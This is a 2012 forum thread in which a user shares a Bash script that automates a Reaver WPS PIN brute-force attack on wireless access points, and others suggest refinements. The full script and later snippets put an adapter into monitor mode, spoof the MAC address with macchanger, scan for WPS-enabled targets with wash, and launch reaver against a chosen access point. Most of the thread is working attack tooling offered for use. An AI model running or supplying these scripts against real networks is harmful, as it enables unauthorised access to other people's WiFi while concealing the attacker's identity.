Reaver Script (Bash)

[Battery_]

I'm just learning how to Bash Script so I decided to make a nice and easy Reaver for idiots script. Let me know what you guys think or if anything else should be added, or any suggestions on the code. Just using this as a launch off point to learn stuff and eventually hopefully a full module for the pineapple.

Just save the below to a file and execute

#!/bin/bash
clear
echo "This script makes it easy to start a reaver attack"
echo ""
echo "[+] Do you need to setup a monitor interface? [y/n]"
read setup
if [[ $setup == 'y' ]]; then
#Setup the monitor interface
echo "[+] What Wireless interfaces do we have..."
iwconfig
echo "[+] Please select an interface to place into Monitor Mode [wlan0]"
read interface
if [[ $interface == '' ]]; then
interface=wlan0 #Default to wlan0
fi
echo "[+] Starting monitor Mode for $interface"
airmon-ng start $interface
iwconfig
fi #End Mon Mode Setup Portion
#Start part of script that executes regardless
echo "[+] What monitor interface should I use? [mon0]"
read monInterface
if [[ $monInterface == '' ]]; then
monInterface=mon0 #Default to mon0
fi
#Spoof the Mon Mac
echo "[+] MacSpoofing $monInterface"
ifconfig $monInterface down
macchanger -r $monInterface
ifconfig $monInterface up
#Check for Targets
echo ""
echo "[+] ------------------------------------------------------[+]"
echo "[+] Checking for WPS enabled APs press (ctrl+c) when done [+]"
echo "[+] ------------------------------------------------------[+]"
wash -i $monInterface
#Set Reaver Target
echo "[+] What is the MAC for the target AP?"
read target
#Set optional functions
reaver #to show the options available in terminal
echo "[+] reaver -i $monInterface -b $target"
echo "[+] Type any other reaver options you'd like besides the above"
read reaverVars
#Start REAVERINGGGGG!!!!
echo "[+] Starting reaver (reaver -i $monInterface -b $target $reaverVars)"
reaver -i $monInterface -b $target $reaverVars
#Stop Monitor Mode Interface if the script set it up
if [[ $setup == 'y' ]]; then
echo ""
echo "[+] killing Monitor Interface"
airmon-ng stop $monInterface
fi
[/CODE]

[AshiOni]

Please correct me if I'm wrong, but If you're spoofing mon0 isn't it required that you use the --mac= switch as well? And wouldn't you want to make sure the wlanX is spoofed if --mac= is set?

[murder_face]

The main reaver script that is use isn't quite as fancy as yours:

#!/bin/sh

echo "enter target: "

read TARGET

echo "enter channel: "

read CHANNEL

sudo reaver -a -S -N -i wlan0 -b $TARGET -vv -c $CHANNEL

[Infiltrator]

Please correct me if I'm wrong, but If you're spoofing mon0 isn't it required that you use the --mac= switch as well? And wouldn't you want to make sure the wlanX is spoofed if --mac= is set?

I think it should be the other way around, instead of spoofing the mon0 interface, the wlan0 interface should be spoofed instead. I use one of the popular Alfa adapters, and I noticed that whenever I spoof the Wlan0 MAC address it automatically spoofs the MAC address of the mon0 interface too.

Edited October 1, 2012 by Infiltrator

[murder_face]

I think it should be the other way around, instead of spoofing the mon0 interface, the wlan0 interface should be spoofed instead. I use one of the popular Alfa adapters, and I noticed that whenever I spoof the Wlan0 MAC address it automatically spoofs the MAC address of the mon0 interface too.

That's the way that I do it. I remember reading somewhere that you have to spoof your MAC on wlan0 in order for mon0 to be spoofed anyway. I guess it could depend on the chipset though. Also, a lot of the time I just switch wlan0 in to monitor mode rather than spoofing anyway. I have a short script to throw wlan0 into monitor mode and change my MAC, and another one to bring it back up in managed mode.

[digip]

You can add in the macchanger command to run against wlan0 to make a random one for you, before bringing up the interface. Can't change it after the NIC is up from what I recall. Has to be done while the interface is down, change it, then bring it up.

[murder_face]

You can add in the macchanger command to run against wlan0 to make a random one for you, before bringing up the interface. Can't change it after the NIC is up from what I recall. Has to be done while the interface is down, change it, then bring it up.

On a side note. I used to used the "ifconfig hw ether" command to change my MAC. Recently I patched my wireless drivers (ath5k) becaue I was having channel -1 problems in aireplay, and now the ifconfig command no longer works.

[AshiOni]

I think it should be the other way around, instead of spoofing the mon0 interface, the wlan0 interface should be spoofed instead. I use one of the popular Alfa adapters, and I noticed that whenever I spoof the Wlan0 MAC address it automatically spoofs the MAC address of the mon0 interface too.

I think we are saying the same thing - I was simply saying that within his script he has the mon0 mac address being changed, but not the wlan0 address - wouldn't you want to change the wlan0 address before you do that? - and then if you do change your mac address the man page for reaver suggests the user would want to use the --mac= flag equaling the mac address of the wlan0 interface.

So maybe add lines for changing the wlan0 mac address

ifconfig $interface down

ifconfig $monInterface down

macchanger -r $interface

macchanger -r $monInterface

ifconfig $interface up

ifconfig $monInterface up

then pick your poison as how you want to script in the $wlan0MAC in to your reaver command line

reaver -i $monInterface --mac="$wlan0MAC" -b $target $reaverVars

Edited October 1, 2012 by AshiOni

[vector]

just use wifite